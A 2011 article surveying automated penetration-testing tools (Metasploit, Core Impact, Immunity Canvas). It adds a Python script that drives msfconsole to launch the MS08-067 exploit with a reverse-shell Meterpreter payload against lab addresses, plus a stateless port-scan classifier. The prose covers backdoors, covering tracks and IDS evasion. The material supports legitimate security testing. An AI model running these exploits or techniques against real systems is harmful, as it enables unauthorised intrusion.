Three automated penetration testing tools for your arsenal

In recent years one of the major developments in the field of hacking has been the emergence of a range of tools for uncovering vulnerabilities. A vulnerability scanner can detect weaknesses, but each finding then has to be exploited by hand. Automated penetration testing tools, on the other hand, come equipped with quality exploits as well. Because a hand-rolled or untested exploit can produce misleading results or crash the target application, automated pen-test tools are generally considered more reliable and effective.

Benefits

  • Automated penetration testing tools ship with robust, high-quality exploits that have been tested and proven, and their exploit libraries are updated frequently.
  • They provide a repeatable process that produces consistent results.
  • The tester can concentrate on the testing process rather than experimenting with individual exploits, which saves time; a mature framework also reduces the chance of running exploits that do not match the target at all.
  • Reports are generated automatically and can be customised.

Here is a look at three popular automated penetration testing tools — Metasploit, Core Impact and Immunity Canvas.

Metasploit

Metasploit is an open source framework originally created by H D Moore. It is written in Ruby and contains a comprehensive range of exploits and payloads for testing whether a remote system is vulnerable. Like any exploitation tool, Metasploit can be used for both legitimate and unauthorised activity.

The basic steps for exploiting a system using the Metasploit Framework include:

1. Choosing and configuring an exploit for a specific target. Metasploit has over 300 exploits for various operating systems.

2. Checking whether the intended target system is vulnerable to the chosen exploit (the module's check function, where one is implemented).

3. Choosing and configuring a payload. A payload is the code that runs on the target once the exploit succeeds, for example a remote shell or a Meterpreter session.

4. Executing the exploit.

Several further options are available for more advanced exploitation, and Metasploit is also widely used for developing and testing new exploits.
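The four steps above are normally typed into msfconsole one by one; the same sequence can be scripted as a resource file so that it runs non-interactively and repeatably, which is the "replicable process" benefit from the list earlier. The following is an added example written for this article, not code from the Metasploit project. The exploit module, payload and the 192.0.2.x lab addresses are illustrative assumptions, and the target-host option name (RHOSTS in current releases, RHOST in older ones) should be confirmed with the module's own `show options`.

```python
"""Build and run an msfconsole resource script that performs the four steps
non-interactively. Module, payload and target values are illustrative assumptions."""
import ipaddress
import shutil
import subprocess
import tempfile
from pathlib import Path


def build_resource_script(exploit, target_ip, payload, lhost, lport=4444,
                          target_option="RHOSTS", extra_options=None):
    """Return the text of a resource script that: (1) selects and configures the
    exploit, (2) runs 'check' against the target, (3) selects and configures the
    payload, and (4) executes the exploit without dropping into the session.

    target_option is the module's target host option (RHOSTS in current Metasploit
    releases, RHOST in older ones); confirm it with 'show options' for the module."""
    # Validate the addresses locally so a typo fails here, not inside msfconsole.
    ipaddress.ip_address(target_ip)
    ipaddress.ip_address(lhost)
    if not 1 <= lport <= 65535:
        raise ValueError(f"LPORT out of range: {lport}")

    lines = [
        f"use {exploit}",                      # step 1: choose the exploit ...
        f"set {target_option} {target_ip}",    #         ... and point it at the target
    ]
    for name, value in (extra_options or {}).items():
        lines.append(f"set {name} {value}")    # any module-specific options
    lines += [
        "check",                               # step 2: is the target vulnerable?
        f"set PAYLOAD {payload}",              # step 3: choose the payload
        f"set LHOST {lhost}",                  #         reverse payloads call back here
        f"set LPORT {lport}",
        "exploit -z",                          # step 4: run it; -z = do not interact with the session
        "sessions -l",                         # list whatever sessions were opened
        "exit -y",                             # leave msfconsole even if sessions are open
    ]
    return "\n".join(lines) + "\n"


def run_resource_script(script_text, msfconsole="msfconsole"):
    """Feed the script to 'msfconsole -q -r <file>'. Returns msfconsole's exit
    status, or None when it is not installed (so the example degrades cleanly)."""
    exe = shutil.which(msfconsole)
    if exe is None:
        return None
    with tempfile.NamedTemporaryFile("w", suffix=".rc", delete=False) as fh:
        fh.write(script_text)
        path = Path(fh.name)
    try:
        return subprocess.run([exe, "-q", "-r", str(path)]).returncode
    finally:
        path.unlink(missing_ok=True)


if __name__ == "__main__":
    # Hypothetical lab values: the MS08-067 module against a Windows host at
    # 192.0.2.10, calling back to the tester's machine at 192.0.2.1.
    script = build_resource_script(
        exploit="exploit/windows/smb/ms08_067_netapi",
        target_ip="192.0.2.10",
        payload="windows/meterpreter/reverse_tcp",
        lhost="192.0.2.1",
    )
    print(script)
    status = run_resource_script(script)
    print("msfconsole not installed" if status is None else f"msfconsole exited {status}")
```

Resource scripts have no conditionals, so `check` here is informational: its output tells the tester whether the exploit attempt that follows was justified. Anyone who wants to abort automatically when the check fails has to drive msfconsole from Ruby (a `<ruby>` block inside the resource file) or from the RPC interface instead.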



Figure 1. Metasploit. [Reference: http://www.metasploit.com]

Core Impact

Core Impact, another popular penetration testing tool, is a commercial product. It can run exploits against a wider range of network and Web application targets than Metasploit. With Core Impact, a few mouse clicks are all one needs to launch a network penetration test and obtain summary reports and output logs on completion.

A key feature of Core Impact is pivoting: using a compromised host as a launch point for exploits against other machines on its network. This is useful for reaching a target network segment that is blocked by a firewall, because the pivot host is already on the inside. From the compromised host one can upload files, install a backdoor, collect data and then clean up one's tracks. The basic steps for using this tool are:

  • Information gathering
  • Attack and penetration
  • Local information gathering
  • Privilege escalation
  • Cleanup
  • Report generation

Figure 2. Core Impact. [Reference: http://www.coresecurity.com]

Immunity Canvas  

Another penetration testing tool on the market is Immunity Canvas, which is written in Python and runs on both Windows and Linux. One of its distinctive features is MOSDEF (“Most Definitely”), a dynamic shellcode generator: it compiles shellcode on the fly for the target, so testers can change the shellcode without the slow and difficult work of debugging shellcode by hand inside an exploit. Canvas also incorporates a “convert slide” option that fragments an exploit's traffic to make detection by an intrusion detection system (IDS) harder.

Canvas lets the tester write new exploits, or generate shellcode with MOSDEF, and package them as Canvas modules; the exploit library is also updated regularly. Another useful component is scanrand, a fast stateless scanner for host discovery and port scanning. Because it keeps no per-probe state it is extremely fast; to stay reliable it encodes a keyed hash of each target address and port in the probe's TCP sequence number (an “inverse SYN cookie”), so that replies can be matched to probes without a state table and forged or unsolicited replies are rejected rather than corrupting the scan results.
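To make the stateless-scanning idea concrete, here is an added example in Python (the language Canvas itself is written in). It is written for this article and is not scanrand's or Immunity's code: the HMAC-SHA256 construction illustrates the inverse SYN cookie principle rather than reproducing scanrand's exact hash, the 192.0.2.x and 203.0.113.x addresses are documentation ranges, and every reply below is constructed in-line rather than captured from the wire. The scanner remembers only the key; a reply is accepted only if its acknowledgement number is one more than the sequence number the key would have produced for that target, which is exactly what lets forged replies be discarded.

```python
"""Stateless SYN-scan bookkeeping in the style of scanrand's 'inverse SYN cookies'.
Added example: the hash construction illustrates the idea, not scanrand's exact code,
and all packets below are constructed in-line rather than captured."""
import hashlib
import hmac
import ipaddress
import secrets
from dataclasses import dataclass

TCP_SYN = 0x02
TCP_RST = 0x04
TCP_ACK = 0x10
SEQ_MASK = 0xFFFFFFFF


def probe_seq(key: bytes, dst_ip: str, dst_port: int) -> int:
    """Initial sequence number for the SYN sent to (dst_ip, dst_port): a keyed hash
    of the destination, truncated to 32 bits. Nothing about the probe is stored;
    the key alone lets us recognise the reply later."""
    material = ipaddress.ip_address(dst_ip).packed + dst_port.to_bytes(2, "big")
    return int.from_bytes(hmac.new(key, material, hashlib.sha256).digest()[:4], "big")


@dataclass(frozen=True)
class TcpReply:
    """The fields of an inbound TCP segment that matter for classification."""
    src_ip: str     # the host that answered, i.e. the target we probed
    src_port: int   # the port we probed
    ack: int        # its acknowledgement number
    flags: int      # TCP flag bits


def classify_reply(key: bytes, reply: TcpReply):
    """Return 'open', 'closed', or None when the segment is not a valid answer to
    one of our probes (unsolicited, replayed from another scan, or forged).
    Both SYN/ACK and RST/ACK answers to a SYN acknowledge seq + 1."""
    expected_ack = (probe_seq(key, reply.src_ip, reply.src_port) + 1) & SEQ_MASK
    if reply.ack != expected_ack:
        return None
    if reply.flags & TCP_SYN and reply.flags & TCP_ACK:
        return "open"       # SYN/ACK: something is listening
    if reply.flags & TCP_RST:
        return "closed"     # RST/ACK: port reachable but nothing listening
    return None


def collect_results(key: bytes, replies):
    """Fold a stream of replies into {(ip, port): state}, dropping anything that
    fails the cookie check. A forged reply therefore cannot inject a result."""
    results = {}
    for r in replies:
        state = classify_reply(key, r)
        if state is not None:
            results[(r.src_ip, r.src_port)] = state
    return results


def demo():
    """Run the classifier over a constructed batch of replies to one target."""
    key = secrets.token_bytes(16)  # fresh per scan, so replies from an old scan cannot be replayed
    seq22 = probe_seq(key, "192.0.2.10", 22)
    seq23 = probe_seq(key, "192.0.2.10", 23)
    replies = [  # constructed sample traffic, not captured packets
        TcpReply("192.0.2.10", 22, (seq22 + 1) & SEQ_MASK, TCP_SYN | TCP_ACK),  # genuine: open
        TcpReply("192.0.2.10", 23, (seq23 + 1) & SEQ_MASK, TCP_RST | TCP_ACK),  # genuine: closed
        TcpReply("192.0.2.10", 80, 0x12345678, TCP_SYN | TCP_ACK),              # forged: wrong ack, dropped
        TcpReply("192.0.2.10", 22, (seq22 + 1) & SEQ_MASK, TCP_ACK),            # bare ACK: not an answer, dropped
    ]
    return collect_results(key, replies)


if __name__ == "__main__":
    for (ip, port), state in sorted(demo().items()):
        print(f"{ip}:{port} {state}")
```

The trade-off to notice is that the scanner cannot tell how many probes went unanswered: with no state table, a filtered port simply never produces a result, so a stateless scan reports open and closed ports but silently omits the rest.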

Canvas is a strong tool for both penetration testing and exploit development, although it is not as easy to use as Core Impact.

 

Figure 3. Immunity Canvas [Reference: http://www.immunitysec.com]


About the author: Harikrishnan R is a freelance security researcher with an interest in Web app vulnerabilities, as well as the founder of TopSecure (an infosec startup). He has also started "Internet guardians", an initiative to protect Websites.

This was first published in May 2011
